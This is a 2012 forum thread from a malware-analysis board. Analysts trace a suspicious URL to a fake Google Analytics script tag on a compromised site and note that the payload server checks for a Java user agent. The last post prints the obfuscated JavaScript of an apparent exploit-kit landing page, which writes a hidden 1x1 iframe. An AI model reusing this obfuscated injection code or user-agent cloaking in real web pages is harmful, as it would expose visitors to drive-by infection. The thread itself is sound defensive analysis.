Malware Domain List

Malware Related => Malware Analysis => Topic started by: SysAdMini on November 26, 2012, 02:04:14 pm

Title: Nice trick on
Post by: SysAdMini on November 26, 2012, 02:04:14 pm
A suspicious url was being blocked by web filtering software. Referrer was
I looked at the code of At a first glance there was nothing suspicious to find.


It took me some time to figure out where the suspicious url came from.
Look at the final script statement at the end of the page code.


Code: [Select]
<script src="" type="text/javascript"></script>
looks unsuspiciously, because it looks like a normal Google Analytics requests. But it's the key.
The url is missing the http:// statement. That means that the url is relative to the current url - actually


There you can find the code creating the supicious url.



I don't get any content from that url. Please let me know if you get something. Url changes occasionally.

Title: Re: Nice trick on
Post by: GmG on November 27, 2012, 02:31:32 pm
You need to include Java in the user agent string


Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Java/1.7.0_5

Title: Re: Nice trick on
Post by: SysAdMini on November 27, 2012, 02:49:13 pm
Thanks ! That brings me one step further.

Now I stuck at an url like this one:

Code: [Select]
It resolves to, but doesn't respond.
Title: Re: Nice trick on
Post by: GmG on November 27, 2012, 07:20:07 pm
the same for me

but it works in urlquery

Title: Re: Nice trick on
Post by: SysAdMini on November 27, 2012, 09:11:21 pm
Current url works.

Code: [Select]
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
xmlns=""   >
<head><meta  content="text/html; charset=utf-8" http-equiv="Content-Type" /><meta http-equiv="Content-Language" content="en"
<meta http-equiv="Cache-control" content="Public"  />  <link  href=""></link>

<title>Smart Tools</title>
<script>function ty0mvk0t2Hu(iFoAu){iFoAu=iFoAu.replace(/~/gi,"\\").replace(/``/gi,"\"");var BlSlw="6874";var agFSNM;var guAA=[];function TKvzf(){var bZhQ='gTzU';if('RPpIXv'=='mCaJjp')sHTZo();}
var vFfUot=0;var NkMcK;for(var i=0;i<iFoAu.length;i++){if((iFoAu.length-i)>=parseInt(BlSlw.substring(vFfUot,vFfUot+1))){if('PEFQ'=='evPd')dyTI='aAhu';var pain=parseInt(BlSlw.substring(vFfUot,vFfUot+1));for(var i2=i+pain-1;i2>=i;i2--){guAA.push(iFoAu.substring(i2,i2+1));var bOVG;}
i+=parseInt(BlSlw.substring(vFfUot,vFfUot+1))-1;function HRSBJ(){}}else{var ch_i=i;guAA.push((iFoAu.substring((ch_i+1-1),(ch_i+1))));if('blkArJ'=='ySUudk')cZQgi='sKBaA';}
BRJi=window;BRJi["wW48wk9Gz5ruNyfQ0HT2VV"]=guAA.join('');if('chMi'=='cBvVw')PPLT='cMKEjG';}</script></head><body><div   id="lcAmX"
class="RWjBA&#66;" ></div><div
qyerD="loQysd" class="UsTu"
id="KvDskKb"  class="ZEQxJH" ></div>
<script src="45270.js"></script>
<script>if('gDWTZ'=='cZLai')hoZTz='bGNpMu';function ZgqLdG(){}
var GchIb=document;var zaHceR;var ODbj="write";function lIaQ(){}
var VbXCqq="\x3c\x69f\x72ame  st\x79\x6c\x65=\"w\x69dt\x68:1px;he\x69ght:1px;po\x73it\x69on:\x61b\x73\x6flute\"  src=\"\x69.html\" \x3e\x3c/\x69fr\x61\x6de\x3e";var iqAKC=252;GchIb.psATl=GchIb[ODbj];if('iBYU'=='moYjY')OnFm='kInw';GchIb.psATl(VbXCqq);var OjkMuE=193;</script>
class="mFqbp"  ></div><div  id="&#101;&#120;Row"  class="&#105;FjO" ></div><div  gUlZ="zwCmzF"  id="b&#75;x&#86;&#80;&#67;" class="c&#105;&#111;I"   ></div><div id="Za&#74;O&#120;y" class="&#82;mj&#72;"
id="OhtulPT"  class="fKHovrZHK" ></div>